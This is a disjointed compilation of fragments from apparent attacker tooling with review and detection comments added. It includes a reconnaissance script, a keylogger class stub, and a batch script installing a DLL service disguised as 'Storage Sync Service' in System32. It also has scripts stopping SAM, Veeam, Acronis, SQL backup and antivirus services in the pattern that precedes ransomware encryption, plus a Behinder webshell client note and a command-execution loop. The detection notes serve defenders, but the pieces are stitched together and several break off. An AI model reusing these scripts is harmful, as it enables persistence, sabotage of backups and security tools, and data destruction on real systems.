.\wipe <directory>
Rewrites every file under the given directory, recursing into subdirectories.
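#!/bin/bash
# Host state snapshot: prints disk, network, process, session, service and
# package information to stdout. Every command only reads state.
#
# No `set -e` on purpose: the commands are independent, so a missing tool
# should cost one section of output rather than abort the rest.
#
# The output is an inventory of listening services, logged-in users and
# installed packages; if it is redirected to a file, restrict that file's
# permissions.

# Mounted filesystems, pseudo filesystems included (-a), sizes in SI units (-H).
df -aH

# Addresses assigned to each network interface.
ip addr

# Listening TCP/UDP sockets, numeric, with owning PID/program (-p).
# Run unprivileged, -p only resolves sockets owned by the calling user.
netstat -tulpn

# All processes with owner and resource columns. BSD syntax has no dash:
# "ps -aux" is parsed as "-a -u x" (processes of a user named x) and only
# falls back to "aux" with a warning when no such user exists.
ps aux

# Current logins plus boot time, run level and dead processes.
who -a

# systemd service units currently loaded; --no-pager keeps the output
# non-interactive.
systemctl list-units --type=service --no-pager

# Status of init-script style services.
service --status-all

# Installed packages (Debian/Ubuntu). apt prints a warning on stderr that its
# CLI is not stable for scripted use; the listing on stdout is unaffected.
apt list --installed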
import json | |
import docker | |
import os | |
import boto3 | |
import subprocess | |
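# Module-level settings. The table-cell residue that trailed each assignment in
# the listing is dropped so the lines parse as Python.

# Placeholder: must be replaced with a real instance ID before the script runs.
TARGET_INSTANCE = "<instance ID>"

# Kept as a string, not an int.
# NOTE(review): presumably a local listener/forwarding port; confirm against the
# code that consumes it.
LOCAL_PORT = "9999"

# NOTE(review): presumably the AWS region handed to boto3; confirm.
REGION = "us-east-1"

# NOTE(review): presumably a named AWS credentials profile. "default" resolves
# to whatever credentials that profile holds on the machine running the script;
# a dedicated least-privilege profile makes the scope of access explicit.
PROFILE = "default"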
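# Builds the argument list for an Active Directory access rule that allows
# "Everyone" the change-password control access right. The rule object is not
# constructed or applied to any directory object within this excerpt.

# Resolve "Everyone" from its well-known SID (WorldSid, S-1-1-0) rather than by
# name, so the lookup does not depend on the OS display language.
$sid = [System.Security.Principal.SecurityIdentifier]::new([System.Security.Principal.WellKnownSidType]::WorldSid, $null)
$everyone = $sid.Translate([System.Security.Principal.NTAccount])

# Control access rights are expressed as ExtendedRight plus the right's GUID as
# the ACE object type.
$adRight = [System.DirectoryServices.ActiveDirectoryRights]"ExtendedRight"

# ab721a53-1e2f-11d0-9819-00aa0040529b is User-Change-Password: the caller must
# supply the account's current password. It is a different right from
# User-Force-Change-Password (reset without the old password); confusing the two
# GUIDs would change the security meaning of the ACE entirely.
$pguid = [Guid]::new("ab721a53-1e2f-11d0-9819-00aa0040529b") # refer to https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-adts/1522b774-6464-41a3-87a5-1e5633c3fbbb

# Order is identity, rights, access control type, object type GUID, inheritance.
# "None" means the ACE applies to the target object only and is not inherited.
# NOTE(review): presumably passed to the ActiveDirectoryAccessRule constructor;
# confirm against the rest of the script.
# NOTE(review): the default user-class security descriptor already allows this
# right to Everyone and SELF, so this looks like restoring a default rather than
# widening access; check the target object's existing ACL for Deny ACEs.
# DACL writes on directory objects are recorded as event 5136 when directory
# service change auditing and a matching SACL are configured.
$accessRuleArgs = $everyone, $adRight, "Allow", $pguid, "None"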
using System; | |
using System.Diagnostics; | |
using System.Windows.Forms; | |
using System.Runtime.InteropServices; | |
using System.IO; | |
class InterceptKeys | |
{ | |
private const int WH_KEYBOARD_LL = 13; | |
private const int WM_KEYDOWN = 0x0100; |
REM Excerpt of a script that replaces a Windows service backed by a DLL. Only the
REM teardown of the old service and the DLL copy are visible here; the step that
REM registers the service is outside this excerpt.
REM NOTE(review): the trailing pipe characters on each line look like table
REM residue from the page this listing was taken from, not part of the commands.
@echo off | |
REM The DLL is placed directly in System32, next to genuine OS binaries.
set "WORK_DIR=C:\Windows\System32" | |
REM DLL file name and service name differ by one letter (storesync / StorSync).
set "DLL_NAME=storesyncsvc.dll" | |
set "SERVICE_NAME=StorSyncSvc" | |
set "DISPLAY_NAME=Storage Sync Service" | |
REM The description text contains the misspelling "collectly". Service name,
REM display name, DLL name and this string are all stable values to hunt for in
REM the Services registry key and in service-install events (System log 7045).
set "DESCRIPTION=The Storage Sync Service is the top-level resource for File Sync. It creates sync relationships with multiple storage accounts via multiple sync groups. If this service is stopped or disabled, applications will be unable to run collectly." | |
REM Remove any existing service of the same name so it can be registered again.
sc stop %SERVICE_NAME% | |
sc delete %SERVICE_NAME% | |
REM System32 always exists, so this mkdir can only report that the directory is
REM already there.
mkdir %WORK_DIR% | |
REM Copies the DLL from the script's own directory; /Y overwrites without asking.
REM Writing into System32 and controlling services both require administrator
REM rights, so a non-OS process creating a DLL there is worth alerting on.
copy "%~dp0%DLL_NAME%" "%WORK_DIR%" /Y |
REM Excerpt: stops the Security Accounts Manager service (samss) and three Veeam
REM services, then force-kills two SQL Server helper processes.
REM Each stop is issued twice, once through net1 and once through net.exe.
REM /y pre-answers the prompt about stopping dependent services, so nothing
REM waits for an operator.
REM Detection: a burst of net.exe / net1.exe process creations with "stop" and
REM "/y" naming backup and database services (Security 4688 or Sysmon 1), and
REM the matching Service Control Manager 7036 "stopped" events. Bulk stops of
REM backup services remove recovery options and release file locks, a pattern
REM that commonly precedes mass file encryption.
REM NOTE(review): the trailing pipe characters on each line look like table
REM residue from the page this listing was taken from, not part of the commands.
net1 stop samss /y | |
net1 stop veeamcatalogsvc /y | |
net1 stop veeamcloudsvc /y | |
net1 stop veeamdeploysvc /y | |
net.exe stop samss /y | |
net.exe stop veeamcatalogsvc /y | |
net.exe stop veeamcloudsvc /y | |
net.exe stop veeamdeploysvc /y | |
REM /F terminates the process without letting it shut down cleanly.
taskkill.exe /IM sqlbrowser.exe /F | |
taskkill.exe /IM sqlceip.exe /F |
# Behinder Webshell Clients | |
## php_cmd.py | |
Minimal client for Behinder PHP webshell (shell.php). Requires Cmd.php from the official client jar. |
REM Excerpt: stops a list of backup, database-backup and antivirus services.
REM The quoted entries are service display names; the bare entries are service
REM key names. /y pre-answers the dependent-service prompt on every call.
REM The names cover Acronis, Veeam, SQLsafe and Backup Exec components plus a
REM service called Antivirus; services that are not installed on the host make
REM net stop return an error and the script carries on with the next line.
REM Detection: many net stop commands against backup and security services from
REM one parent process within seconds (Security 4688 or Sysmon 1), followed by
REM Service Control Manager 7036 "stopped" events. Backup agents that can be
REM stopped by any local administrator are a recovery risk; tamper protection
REM and off-host or immutable backup copies limit the impact.
REM NOTE(review): the trailing pipe characters on each line look like table
REM residue from the page this listing was taken from, not part of the commands.
net stop "Acronis VSS Provider" /y | |
net stop "Enterprise Client Service" /y | |
net stop "SQLsafe Backup Service" /y | |
net stop "SQLsafe Filter Service" /y | |
net stop "Veeam Backup Catalog Data Service" /y | |
net stop AcronisAgent /y | |
net stop AcrSch2Svc /y | |
net stop Antivirus /y | |
net stop ARSM /y | |
net stop BackupExecAgentAccelerator /y |
@echo off | |
setlocal enabledelayedexpansion | |
set "true=1" | |
:loop | |
if defined true ( | |
set /p c="%cd%> " | |
start !c! | |
set c= |